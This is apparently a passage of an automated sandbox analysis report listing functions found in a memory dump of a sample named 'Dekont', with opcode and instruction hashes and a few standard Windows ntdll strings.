                                  • Instruction Fuzzy Hash: 46D012371D054CBBCB119F66DC06F957BA9E754BA0F544020B505875A1C63AE950D584
                                  Function 0100CA24 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96af0f16425a7c5357343ea942f21762c8feb28471699fadc3092d666c1d1f0d
                                  • Instruction ID: 5f798a8f708466448316e96153020b4344c8ce15e322e288cbb6b1bf4f855aab
                                  • Opcode Fuzzy Hash: 96af0f16425a7c5357343ea942f21762c8feb28471699fadc3092d666c1d1f0d
                                  • Instruction Fuzzy Hash: 6BD05E309010418BEF27CB48CA5892E36B0EB44640F4000F8FA8152120D72AD9418A10
                                  Function 00FE02A0 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: a2dd2152bd6013bd9f6ca5e0dfd5f9af34eabae9c375b9f0a90e5fee8b9ae6b8
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 5FD09235612A80CFC61A8B09C5A8B1533E8BB84B44F8544A0E541CBB21DA6CD980CA00
                                  Function 0100C700 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 97f9381a4366f65f36aba33dccc0de18c5aa3680a80a27c18cd7e5377e6337e3
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: 73C08C33290688AFC712EF99DD06F027BE9EB98B40F100061F3058B671C635FD20EA84
                                  Function 00FF0310 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: 4fb7baa3e62328aaa65705b19ca45ea59ba95f86c64565750c39bf10d8d7047c
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: D9D0123610024CEFCB01DF41C890DAA772AFFC8710F108019FD19076118A35ED62DA50
                                  Function 00FD0750 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: 3f8f3f3bcfcf4f3b798b05c9e316faa0f64baec5b6e56dffbc88f4ea6a8c3a3d
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: 20C08C343005488FCF11CB1AC688F0433E0F740300F1008C0E800CB722E224E801CA00
                                  Function 01014340 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd2bd03f3dd3e33c7d49b96a129e2a8e0da217dbc579a25a96447444418e2b1d
                                  • Instruction ID: f40af1057f9331e411b886d7537eb00076bae495ecc6524b4066e1a73b88996e
                                  • Opcode Fuzzy Hash: cd2bd03f3dd3e33c7d49b96a129e2a8e0da217dbc579a25a96447444418e2b1d
                                  • Instruction Fuzzy Hash: 9490023560581012A140715888855464045A7E0301B55C013E0824554CCE148A565361
                                  Function 01014650 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7134538066ddab907692986ab770bed6c4d1cb459e55a4b4cffc70cf66c0f0b6
                                  • Instruction ID: ee4865604a52eb024d824982ae5cda61b528ef9dfc486b6dc3977b86a24750a2
                                  • Opcode Fuzzy Hash: 7134538066ddab907692986ab770bed6c4d1cb459e55a4b4cffc70cf66c0f0b6
                                  • Instruction Fuzzy Hash: CA900265601510425140715888054066045A7E1301395C117E0954560CCA1889559369
                                  Function 01012B80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d113fc634169caf5b9d713bd0eb4212e1255c53a0c651f14393ed81749acd868
                                  • Instruction ID: 68a055a1dceaa2e933a323fb5475e065e3d1b06f08df22ca2cc2a7be3ab6e07c
                                  • Opcode Fuzzy Hash: d113fc634169caf5b9d713bd0eb4212e1255c53a0c651f14393ed81749acd868
                                  • Instruction Fuzzy Hash: 7B90023520141802E10471588805686004597D0301F55C013E6424655EDA6589917231
                                  Function 01012BA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7ffd1ebfd6c91d67825cc6ba198cd9eaa92f69895009c7ace6a51d579d91fdf
                                  • Instruction ID: 259e81b68a6b48f41d7ce458a2debcdc52364e8246820a5606b45c6e5e33021b
                                  • Opcode Fuzzy Hash: e7ffd1ebfd6c91d67825cc6ba198cd9eaa92f69895009c7ace6a51d579d91fdf
                                  • Instruction Fuzzy Hash: 9590023560541802E15071588415746004597D0301F55C013E0424654DCB558B5577A1
                                  Function 01012BE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3bbbe0bb2c5b9cd2b57b5dce32ece0f8a53f38b77928f19079f5950c37be1ed7
                                  • Instruction ID: c10834e21a52301d81a96ac1992fc78372d21d417fc5bb9ce73c91aeb9593357
                                  • Opcode Fuzzy Hash: 3bbbe0bb2c5b9cd2b57b5dce32ece0f8a53f38b77928f19079f5950c37be1ed7
                                  • Instruction Fuzzy Hash: 7090023520545842E14071588405A46005597D0305F55C013E0464694DDA258E55B761
                                  Function 01012AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 384f9a399981430a400e235c90e0474a39ec52269adf0339a6d4415f7c4a13fc
                                  • Instruction ID: dfcf5459d6ddba410fecb208dc18301059ec9d12b4a9cbce2706b03a896112a7
                                  • Opcode Fuzzy Hash: 384f9a399981430a400e235c90e0474a39ec52269adf0339a6d4415f7c4a13fc
                                  • Instruction Fuzzy Hash: FE9002A5201550925500B258C405B0A454597E0201B55C017E1454560CC92589519235
                                  Function 01012AF0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cd2e77e301268609284f4c70d87cc84bb85c70c48b2c9e765a20881d7b97d2a
                                  • Instruction ID: 8930bbc56bf15ed24f3b879ab5a5efeb912abeab3d68ade51ee1e8531666634f
                                  • Opcode Fuzzy Hash: 3cd2e77e301268609284f4c70d87cc84bb85c70c48b2c9e765a20881d7b97d2a
                                  • Instruction Fuzzy Hash: 3F900229221410021145B558460550B0485A7D6351395C017F1816590CCA2189655321
                                  Function 01012D00 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31ad2ce8c86b3128aed0c8efb622da17f8624a6967815a79b14799cf69c96948
                                  • Instruction ID: a566f87c4d72fd3645a037fbc2d283c930ca4c01af371de7ad2d994938e676a1
                                  • Opcode Fuzzy Hash: 31ad2ce8c86b3128aed0c8efb622da17f8624a6967815a79b14799cf69c96948
                                  • Instruction Fuzzy Hash: CA90022520545442E10075589409A06004597D0205F55D013E1464595DCA358951A231
                                  Function 01012DB0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 643eee78aa51f15b21832bedd712d42ffa36adf1446b60981558ad691afab158
                                  • Instruction ID: b08358e654bcd53eb51a6aa1df11e8155d97bcba4fcd37fa17f319ebf85d3807
                                  • Opcode Fuzzy Hash: 643eee78aa51f15b21832bedd712d42ffa36adf1446b60981558ad691afab158
                                  • Instruction Fuzzy Hash: 6790023524141402E141715884056060049A7D0241F95C013E0824554ECA558B56AB61
                                  Function 01012C60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1699ada4a5185dfc5a67b7e2e542468d65139aee4e80b1f8e828cf49c679298
                                  • Instruction ID: 5bdf75643c09b24e62430329454503668f8277f0c41d117dca18915adb055a8c
                                  • Opcode Fuzzy Hash: b1699ada4a5185dfc5a67b7e2e542468d65139aee4e80b1f8e828cf49c679298
                                  • Instruction Fuzzy Hash: D990023520141842E10071588405B46004597E0301F55C017E0524654DCA15C9517621
                                  Function 01012CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1ecfb6742826401dffc4b69df11b36629ceec2569fc074aaa8eabdbd8999b0d
                                  • Instruction ID: a1601939176bf862cb9ffd2582753b9af3d8c39ea058c6b347e3cb53d30b09df
                                  • Opcode Fuzzy Hash: b1ecfb6742826401dffc4b69df11b36629ceec2569fc074aaa8eabdbd8999b0d
                                  • Instruction Fuzzy Hash: 6290022560541402E14071589419706005597D0201F55D013E0424554DCA598B5567A1
                                  Function 01012CF0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc322c05ffd400ccd1fbe7fff8753ac7596397478b8d274d593e9a95b83db663
                                  • Instruction ID: 6e027acde5452c15fad8be0e577ad2cf3e23ce7eec4f4d881f7acf4608a5f595
                                  • Opcode Fuzzy Hash: bc322c05ffd400ccd1fbe7fff8753ac7596397478b8d274d593e9a95b83db663
                                  • Instruction Fuzzy Hash: C490023520141403E10071589509707004597D0201F55D413E0824558DDA5689516221
                                  Function 01012F60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e66c29b72d3e1f7ddd55803e56d6c9117b2e1ee51216d5b601af61886df6c632
                                  • Instruction ID: 1572f4a534b08bee58f1dc42f2a94482db9f096e0d53a3ab042231f8e015eefc
                                  • Opcode Fuzzy Hash: e66c29b72d3e1f7ddd55803e56d6c9117b2e1ee51216d5b601af61886df6c632
                                  • Instruction Fuzzy Hash: 4990026521141042E10471588405706008597E1201F55C013E2554554CC9298D615225
                                  Function 01012FA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c085dc961f3cf0a4520a59bd8d034a8a4906d50796440be32dfa48cdab094a8e
                                  • Instruction ID: 88456a1e6594f462376ae443c9392f20f948cae3c4e17e4a2e5c201cacac5083
                                  • Opcode Fuzzy Hash: c085dc961f3cf0a4520a59bd8d034a8a4906d50796440be32dfa48cdab094a8e
                                  • Instruction Fuzzy Hash: 2790023520181402E10071588809747004597D0302F55C013E5564555ECA65C9916631
                                  Function 01012E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6e439bc982f7b23181877ae8b3bf4b348c9ee9d3bc2af0d7da770d20137d698
                                  • Instruction ID: 55932979b362d7112ac556689190567d50f46e5bf5d7bb3d3568ee2c98c18e0e
                                  • Opcode Fuzzy Hash: b6e439bc982f7b23181877ae8b3bf4b348c9ee9d3bc2af0d7da770d20137d698
                                  • Instruction Fuzzy Hash: 8E90022530141402E102715884156060049D7D1345F95C013E1824555DCA258A53A232
                                  Function 01012EE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d819e72246d65d30cc2e6ffd8d022c851acf7f274857a84d4c60834eb8b288e
                                  • Instruction ID: 90658905438db41ec08453abe34d47d033b3a520e86f33465f037c490676d4f8
                                  • Opcode Fuzzy Hash: 1d819e72246d65d30cc2e6ffd8d022c851acf7f274857a84d4c60834eb8b288e
                                  • Instruction Fuzzy Hash: 1A90026520181403E14075588805607004597D0302F55C013E2464555ECE298D516235
                                  Function 01013010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75226dbcac9d493af02052270a366b7cdfa12e4aee886860017449b45125491a
                                  • Instruction ID: ae84d1ae162918f72419807b969d12ce7ebde76cbf0eaf3ccb23051d0fef9778
                                  • Opcode Fuzzy Hash: 75226dbcac9d493af02052270a366b7cdfa12e4aee886860017449b45125491a
                                  • Instruction Fuzzy Hash: 5990022520185442E14072588805B0F414597E1202F95C01BE4556554CCD1589555721
                                  Function 01013090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 250de4dd8bf728d07ae50d749a7de66e44f7efa21d3cf3fb7ac184ff6daf5243
                                  • Instruction ID: b51b7714fb439fe7e3cd30227d71ececed176fb28b74405ec71a60f3d39cbc76
                                  • Opcode Fuzzy Hash: 250de4dd8bf728d07ae50d749a7de66e44f7efa21d3cf3fb7ac184ff6daf5243
                                  • Instruction Fuzzy Hash: C790022524141802E1407158C4157070046D7D0601F55C013E0424554DCA168A6567B1
                                  Function 010135C0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fa4cf5a11a327b20ce798ca52cf1545aa995a03e2184edcc6e7ae626cfa32a3
                                  • Instruction ID: f045bbabdf10b9e33660e929dc850e5c970431d518e08dd1f75342c03be27110
                                  • Opcode Fuzzy Hash: 7fa4cf5a11a327b20ce798ca52cf1545aa995a03e2184edcc6e7ae626cfa32a3
                                  • Instruction Fuzzy Hash: 9A90023560551402E10071588515706104597D0201F65C413E0824568DCB958A5166A2
                                  Function 010139B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb068e2d645bbc09f5a7976bfdcff8201aaa4abc953708db3b84dbf903988ae1
                                  • Instruction ID: 47f305b0bb127cca0859d81c51b04241c2f05c1b6f78568304fab87e634e8b48
                                  • Opcode Fuzzy Hash: fb068e2d645bbc09f5a7976bfdcff8201aaa4abc953708db3b84dbf903988ae1
                                  • Instruction Fuzzy Hash: 8490022524546102E150715C84056164045B7E0201F55C023E0C14594DC95589556321
                                  Function 01013D10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab1f2fdcdca7a92655153461e67b2987e914fcf7322e862453090bd043f1a5c5
                                  • Instruction ID: 0204eb7b6b7de87f10092e825dce7d3b4aca8fe32a92961c41b20fab02973c0f
                                  • Opcode Fuzzy Hash: ab1f2fdcdca7a92655153461e67b2987e914fcf7322e862453090bd043f1a5c5
                                  • Instruction Fuzzy Hash: 4490023520241142A54072589805A4E414597E1302B95D417E0415554CCD1489615321
                                  Function 01013D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3f6658ab169afc5aa27b1c4200a262c30af5f5bb550b117866402303630f9f7
                                  • Instruction ID: b8874562eb4bff36267ff08e200b28a984c06d1873dd87f06ccdad6df5ebe9d9
                                  • Opcode Fuzzy Hash: e3f6658ab169afc5aa27b1c4200a262c30af5f5bb550b117866402303630f9f7
                                  • Instruction Fuzzy Hash: 7090023920141402E51071589805646008697D0301F55D413E0824558DCA5489A1A221
                                  Function 01012C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: cd193d427c8bc54c9700bb562759cebafdfabd1fdf1b7ed8acb8218a8e9b6d98
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 01012890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: b32c619902eebbbd55dadf80eed74b646b713a749d4d995aa676110a2ccbcf86
                                  • Instruction ID: 53d161d5ffbf7e0cbfea49449e3c852109b7df1b25fa92869e6673c5e1bc7405
                                  • Opcode Fuzzy Hash: b32c619902eebbbd55dadf80eed74b646b713a749d4d995aa676110a2ccbcf86
                                  • Instruction Fuzzy Hash: EB51D7B5A04216BFDB11DB9C89D097EFBF8BB48240B648169F4E5D7645D338DE408BE0
                                  Function 01082410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: c7b726cc4614239cfe5d6635eb14ea624900204c7db2f0ca260a3c6342134dc6
                                  • Instruction ID: a4bde7c2748c38a90a203bc6c1f8c293f5bb3596a3b828e87e894d278f9c9768
                                  • Opcode Fuzzy Hash: c7b726cc4614239cfe5d6635eb14ea624900204c7db2f0ca260a3c6342134dc6
                                  • Instruction Fuzzy Hash: 585116B5A48656AECB70EF5CC89097FBBF8EF44200B448469E4D6D3681EA74DA40C770
                                  Function 01007630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01044787
                                  • ExecuteOptions, xrefs: 010446A0
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01044655
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01044742
                                  • Execute=1, xrefs: 01044713
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010446FC
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01044725
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 3caa63535a2b5efc7cd36c484625b5bef5e89455dc1e306c20554fe5af6396af
                                  • Instruction ID: 96ad50edc12b26db422a8ab3c87b8719ea4842a46c5ef21f5703d37fc3849703
                                  • Opcode Fuzzy Hash: 3caa63535a2b5efc7cd36c484625b5bef5e89455dc1e306c20554fe5af6396af
                                  • Instruction Fuzzy Hash: D7512C716002096AFF12DB68DC95BEE77A8BF18340F5400E9D5C5A71C1DB75AA418F51
                                  Function 0101B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 98f025fc443ac71db041a1140c786ada3efa0f62445cdc90a6b14fd9cce8d7f0
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 6781D170E052498EEF258E6CC8907FEBBF1BF59720F184599E8D1A7299C73C8841CB61
